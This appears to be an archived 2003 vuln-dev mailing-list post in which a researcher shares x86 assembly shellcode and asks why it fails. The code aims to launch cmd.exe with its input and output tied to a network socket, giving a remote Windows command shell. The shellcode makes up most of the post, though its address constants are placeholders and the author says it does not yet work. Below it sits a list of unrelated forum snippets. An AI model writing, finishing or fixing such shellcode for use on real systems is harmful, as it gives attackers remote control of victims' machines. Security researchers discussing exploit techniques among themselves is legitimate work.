Re: Windows reverse Shell

From: Berend-Jan Wever (skylined@edup.tudelft.nl)
Date: 02/05/03

  • Next message: Ali Saifullah Khan: "Re: Windows reverse Shell" 
    Date: 5 Feb 2003 00:54:44 -0000
From: Berend-Jan Wever <skylined@edup.tudelft.nl>
To: vuln-dev@securityfocus.com
    ('binary' encoding is not supported, stored as-is) In-Reply-To: <00ef01c2cc6c$7fb7a030$a7db5cdb@sk4n>

    I wrote a little piece of shellcode that should spawn a shell using a
    socket in %ebp, which will execute cmd.exe succesfully. The problem is
    that cmd.exe dies right away. Has anybody got an idear why ? The source
    (asm for linux) is included.

    Kind regards,

    Berend-Jan Wever

        Start:
        MakeStringAndNegEbx:
          mov $',', %al
          xor %ecx, %ecx
          dec %ecx
          repne scasb # search for ','
          sub %al, -1(%edi)
          neg %ebx
          ret
        
        GetLibraryAndProcAddress: # {
          push %edi # > libName
          mov $-0xXXXXXX, %ebx #
          call MakeStringAndNegEbx # put 0 after libName
          call *(%ebx) # < LoadLibraryA(libName);

          push %edi # > procName
          push %eax # > libHandle
          mov $-0xXXXXXX, %ebx #
          call MakeStringAndNegEbx # put 0 after ProcName
          call *(%ebx) # << GetProcAddress(libHandle, procName);
          ret
        # }

        main1:
          # %ebp = socket
          pop %edi # < %edi = &strings
          
          # create a struct StartupInfo on the stack.
          xor %eax, %eax
          push %ebp # HANDLE hStdError = socket
          push %ebp # HANDLE hStdOutput = socket
          push %ebp # HANDLE hStdInPut = socket
          push %eax # LPBYTE lpReserved2 = NULL
          inc %eax # WORD cbReserved2 = 0;
          push %eax # WORD wShowWindow = 1;
          mov %al, %ah # 0x101
          push %eax # DWORD dwFlags = STARTF_USESHOWWINDOW |
          xor %eax, %eax # STARTF_USESTDHANDLES
          push %eax # DWORD dwFillAttribute = 0
          push %eax # DWORD dwYCountChars = 0
          push %eax # DWORD dwXCountChars = 0
          push %eax # DWORD dwYSize = 0
          push %eax # DWORD dwXSize = 0
          push %eax # DWORD dwY = 0
          push %eax # DWORD dwX = 0
          push %eax # LPTSTR lpTitle = NULL (program name)
          push %eax # LPTSTR lpDesktop = NULL (inherit)
          push %eax # LPTSTR lpReserved = NULL
          mov $0x44, %al
          push %eax # DWORD cb = 0x44 (length);
          mov %esp, %esi

          # create a struct ProcessInformation on the stack.
          xor %eax, %eax
          push %eax # HANDLE hProcess;
          push %eax # HANDLE hThread;
          push %eax # DWORD dwProcessId;
          push %eax # DWORD dwThreadId;

          # create a process with STD I/O handles hooked to socket.
          push %esp # > lpProcessInformation -> stack
          push %esi # > lpStartupInfo -> stack
          push %eax # > lpCurrentDirecty: NULL
          push %eax # > lpEnvironment: NULL
          push %eax # > dwCreationFlags: 0
          inc %eax
          push %eax # > bInheritHandles: 1 (true)
          dec %eax
          push %eax # > lpThreadAttributes: NULL
          push %eax # > lpProcessAttributes: NULL
          push %edi # > lpCommandLine: &('cmd.exe')
          push %eax # > lpApplicationName: NULL
          call MakeStringAndNegEbx # put 0 after commandline
          call GetLibraryAndProcAddress # LoadLibrary and GetProcAddress
          call *%eax # <<<<<<<<<< CreateProcess(...);
          
        InfinitLoop:
          jmp InfinitLoop # wait forever.

        EntryPoint:
          lea 0xXX(%esp), %eax # socket is on the stack at XX
          mov (%eax), %ebp # socket
          call main1
        End:

    The code is followed by this string:
        "cmd.exe,kernel32.dll,CreateProcessA,"

    Relevant Pages

    • Re: Interrupts handling in ADA
      ... I have 4 tasks that execute at the same time: ... Sorry what does ATC stand for? ... Code of socket body: ... There is a queue of calls to each entry, ...
      (comp.lang.ada)
    • Re: [opensuse] different types of shell scripts
      ... Execute commands from a file in the current shell. ... This 'execute' the setting of shell/environment variables. ... and what I would consider BAD PRACTICE is running in the current shell things that should be run in a sub-shell or sub-process. ... There was a "Transient Program Area" and the CLI caused the executive to overlay the CLI with the application. ...
      (SuSE)
    • Re: Emulating Netcat and connecting to bind shells
      ... Hopefully those exploits are for good purposes, ... why not connect to the shell directly from Ruby ... that you switch to using the socket primitives directly and avoid ...
      (comp.lang.ruby)
    • Re: Redirection issue
      ... 1- execute input commands from standard input, ... the phrase "it does not work anymore" carries very little meaning. ... after compilation and execution of the shell with a simple command like ...
      (comp.lang.c)
    • vulnerabilities in scponly
      ... without allowing shell access. ... scponly makes no effort to verify the path to the scp or sftp-server ... arbitrary commands by simply uploading a file. ... However, if this is *NOT* the case, the user could execute arbitrary ...
      (Bugtraq)